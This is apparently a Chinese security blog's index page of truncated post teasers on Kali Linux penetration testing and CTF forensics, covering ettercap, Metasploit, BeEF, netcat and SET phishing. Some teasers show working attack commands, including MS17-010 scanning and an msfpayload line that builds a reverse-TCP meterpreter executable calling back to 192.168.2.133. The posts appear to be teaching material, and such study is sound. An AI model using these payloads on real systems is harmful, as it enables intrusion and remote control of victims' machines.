梦想专栏

安装kali linux 2017.1 【一、更新源 升级软件和内核等】呃，我这次安装是在VMware WorkStation里进行的，具体操作系统安装步骤不谈。ISO文件下载地址：https://www.kali.org/downloads/说下安装后的升级操作。下面的操作都是在root下进行的，避免有些指令不可用或文件打不开。1. 先确定自己是什么版本：lsb_release -a2. 用文本...

笔记一：ettercap是什么？我们在对WEB安全检测的时候都会用到Cain和netfuke这两款工具，功能相信用过的朋友多多少少都知道，但这两款工具是在windows下运行的。而ettercap是在linux下运行的 。其实功能都是差不多的，我称呼它为嗅探工具，ARP欺骗，DNS，劫持，中间人攻击等等。总之这是一款强大的安全测试工具。笔记二：DNS简单说明了解DNS是什么：Dom...

背景：参照博客：https://www.cnblogs.com/backlion/p/10402499.html大致问题是 对一个内网的靶机进行渗透。 首先使用nmap 扫描内网存活主机，发现192.168.1.13 主机开启了110 143端口。说明该服务器是一个邮件服务器。同时开启了80端口，我们打开了80网站 注释信息为 @fowsniffcorp ，我们从此入手进行探究。访...

一、背景 学习了两周的msf 还没怎么实战过，有点手痒，顺带手上任务差不多完成了，就借此机会去实践一把！二、上手1、指定网段扫描是否存在ms17-010漏洞1、Use auxiliary/scanner/smb/smb_ms17_0102、Set rhosts 192.168.1.1-2553、Set threads 104、run还真有那么几台机器没打补丁。哈哈哈 盘他...

0x00 功能说明：功能强大的网络工具，在网络工具中有“瑞士军刀”美誉，其有Windows和Linux的版本。因为它短小精悍,功能实用，被设计为一个简单、可靠的网络工具，可通过TCP或UDP协议传输读写数据。同时，它还是一个网络应用Debug分析器，因为它可以根据需要创建各种不同类型的网络连接。0x01 nc的作用（1）实现任意TCP/UDP端口的侦听，nc可以作为serve...

一、 背景在CTF赛中，有时候会接触到数据包相关的题目，这篇文章目的就是了解相关题目的解决思路。本文会长期更新下去。二、实战实战（1）： 直接从数据包中找 flag、FLAG、unicode类字符串实战（2）： 需要绕个圈子的题目（base64编码题目）比如说： 给了一个数据包，让你找flag，在实战（1）方法无效的情况下，该如何寻找一般情况下，都会埋一个flag在数...

环境说明：kali linux(192.168.0.114) 黑阔滴设备 win7 (192.168.0.113) 妹纸的pc认识beefBEEF(The Browser Exploitation Framework)：一款浏览器攻击框架，用Ruby语言开发的，Kali中默认安装的一个模块，用于实现对XSS漏洞的攻击和利用。BeEF主要是往网页中插入一段名为hook.js的JS脚...

安装方法参考：https://mp.weixin.qq.com/s?__biz=MzI5MDQ2NjExOQ==&mid=2247486369&idx=1&sn=9dfad1fcfde8d6dcea77d302e14d7b02&chksm=ec1e3b89db69b29f24ca07edeba2c65f8dbce013fe3613f3ad328b908e41c...

描述这篇文章列出了CTF中Forensics（取证）类型题的技巧和窍门，展示了CTF中常用工具的使用场景和使用方法。文件格式（File Formats）十六进制文件头和对应ASCII码通过查看文件头前四到五个字节的十六进制数来识别文件类型。参考Hex file and Regex Cheat Sheet和Gary Kessler File Signature Table...

在对目标进行渗透测试的时候，通常情况下，我们首先获得的是一台web服务器的webshell或者反弹shell，如果权限比较低，则需要进行权限提升；后续需要对系统进行全面的分析，搞清楚系统的用途；如果目标处于一个内网环境中，那么我们就需要通过它对内网的其它终端进行信息收集和渗透测试，更全面地挖掘系统中存在的安全隐患。本期安仔课堂，ISEC实验室的向老师为大家介绍如何使用MSF进行后渗透测试。...

[不一定能成功，因为邮件服务器会检测携带附件]0x00 鱼叉式钓鱼攻击攻击者通过发送带有攻击性的邮件给受害者，一旦受害者打开攻击邮件，点开攻击邮件中的附件等，就会给受害者的电脑造成一定的影响。0x01 钓鱼攻击步骤【Step1】root@kali:~# setoolkit 启动SET终端kali linux启动SET终端，出现下图。【Step2】set&gt...

作者：3gstudent，如若转载，请注明出处：http://www.mottoin.com/tools/110701.html0x00 前言在内网渗透中，信息搜集尤为重要。 面对内网的复杂环境，虽说网络扫描容易暴露自己，但通过扫描可以发现内网的存活主机、开放端口，运行服务、操作系统等信息，为进一步渗透奠定基础。 扫描工具的选取，不仅要考虑功能，更要考虑工具的适用性。 现实中的跳板通常并不...

server/capture/http_javascript_keyloggerDEMO使用的官方的效果图：使用方法:show options 看看msf auxiliary(server/capture/http_javascript_keylogger) > optionsModule options (auxiliary/server/capt...

Often one of the most useful (and to the beginner underrated) abilities of Metasploit is the msfpayload module. Multiple payloads can be created with this module and it helps something that can give y...

00×01首先，我们先来生成一个 meterpreter 类型的 PALOAD ：msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.2.133 LPORT=1211 X >x.exe00×02建立反弹处理 exploit ：use exploit/mutil/handlerset payload wi...

1、https://blog.youkuaiyun.com/xiaopan233/article/details/828083862、 https://blog.youkuaiyun.com/qq_38240166/article/details/79476678[rhosts 目标机 lhost 原始攻击机] remoter hosts / local host在meterpreter 下输入s...

在其最基本的使用，meterpreter 是一个 Linux 终端在受害者的计算机上。这样，我们的许多基本的Linux命令可以用在meterpreter甚至是在一个窗口或其他操作系统。这里有一些核心的命令可以用在meterpreter。? – 帮助菜单 background – 将当前会话移动到背景 bgkill – 杀死一个背景 meterpreter 脚本 bglist – 提供...

一、SET简介社会工程师工具包（SET）全称为Social-Engineer Toolkit，由TrustedSec的创始人创建和编写。它是一个开源的Python驱动工具，旨在围绕社交工程进行渗透测试，已经在包括Blackhat，DerbyCon，Defcon和ShmooCon在内的大型会议上提出过。它拥有超过200万的下载量，旨在利用社会工程类型环境下的高级技术攻击。TrustedSec认为...

一、说明说道图片隐写，应该算是一种信息隐藏，属于信息保护机制。二、题目这是一个利比亚-密码有多简单的题目。使用的主要工具为： binwalk、foremost、dd1、首先将图片传至kali。使用binwalk查看文件结构【很奇怪- 为什么没有zip的开始位置呢？只有footer？】这边是一个正常的文件结构 可以看到 zip有起始和结束2、使用forem...

转载请注明出处：https://blog.youkuaiyun.com/l1028386804/article/details/86593093最近，我升级了Kali系统，升级后，尼玛Metasploit各种蛋疼的事情就发生了，我通过Metasploit整合OpenVAS，最后执行导入数据库的时候，尼玛就报出了如下错误：opts must include a valid :workspace于...